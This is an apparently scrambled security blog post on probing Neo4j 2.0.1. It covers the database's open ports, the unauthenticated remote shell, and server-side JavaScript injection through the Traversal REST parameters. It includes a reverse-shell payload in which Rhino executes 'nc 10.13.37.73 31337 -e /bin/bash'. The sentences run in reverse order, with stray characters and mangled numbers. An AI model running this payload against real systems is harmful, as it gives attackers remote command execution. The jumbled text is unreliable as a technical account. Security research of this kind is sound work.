Neo4j uses the nice Mozilla Java implementation of Javascript : Rhino ! Roughly, Rhino magically binds Java class to Javascript and for instance permit this beauty : ().exec("nc 10.13.37.73 31337 -e /bin/bash") īut don’t worry, Neo4j realized it and patch it in 1.9.M02 according to ChangeLog 1.9.M02
The point is this two parameters executes arbitrary Javascript ! So let’s imagine a developper who create a webapp that use REST to call Traversal with prune_evaluator or return_filter created from concatenation of user controlled parameter… Yep, we will get a nice SSJI but what could we do with this ? Again, in the documentation they warn : Briefly, Traversal REST requests can use two special parameters (prune_evaluator and return_filter) to lead the way traversal is done. In their warning about arbitrary code execution, they point us on Traversal REST endpoints. (Just use the good products to do their jobs !)īut anyway, let’s find the mentionned ‘Arbitrary code execution’ ! Traversal REST endpoints It’s the graph database technology, the rest is bonus to help developpers to be more efficient.Īs they announce, it’s a really good idea to use a web proxy (nginx for instance) to control access to the REST api. Moreover, remember that Neo4j technology is not the web server, REST api or shell access. Reading reveals that Neo4j warn a lot about security of their product.įor a sysadmin point of view, this mean you have to think and provide a secure environment for production as Neo4j come with a development environment configuration.
Then I looked for a way to authenticate and authorise connection on this ‘remote shell’ or on web interface, unfortunately it seems impossible without plugins… On the other side, I didn’t find a way to bind 1337 ‘remote shell’ on localhost only, you can enable or disable it completely… 1337 port, the jrmi interface that responds the 4th port (random) for neo4j-shell.Īs any services it is possible to prevent remote access by binding it on localhost, but only for HTTP and HTTPS services… It opens 4 ports, 74 respectively HTTP and HTTPS interface, it’s jetty-9.0.5 webserver.
It also provides a ‘remote shell’, it’s a jrmi interface that gives another type of access to your database. I didn’t install any plugin and began to look at the beast ! Neo4j is written in Java and provides a very beautiful web interface to create nodes, relations and graph stuff. I firstly downloaded the last stable version I found : neo4j-community-2.0.1. As you can see on their blog, Neo4j is really active and updates come really often ! The v1 was released in 2010 and v2 in 2013 and I didn’t find any specific paper about security so it may be interesting… Don’t hesitate to correct me if I say something wrong ! Let’s read the manual ! Following interest for NoSQL (see MongoDB exploit :D), this time I wanted to check Neo4j, the famous Graph Database.
0 kommentar(er)
